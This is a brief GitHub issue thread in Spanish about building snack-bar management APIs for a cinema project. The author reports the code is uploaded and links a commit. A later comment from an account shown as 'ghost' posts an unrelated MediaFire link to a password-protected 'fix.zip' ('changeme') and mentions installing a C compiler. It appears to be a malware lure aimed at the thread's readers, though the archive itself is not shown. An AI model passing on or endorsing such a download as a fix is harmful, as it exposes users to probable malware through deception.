### ISSUE TITLE
Crear API's de gestion del snack bar

### ISSUE THREAD

**Issue by Aisak921** [ISCOUTB/AH-CineManager#10]

**Comment by Aisak921** [comment]
Ya subidas en carpeta BackEnd

Commit: https://github.com/ISCOUTB/AH-CineManager/commit/2636a5ee88be6e9b1028e8260c17c72edae56008

**Comment by ghost** [comment]
try this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme

you may need to install the c compiler
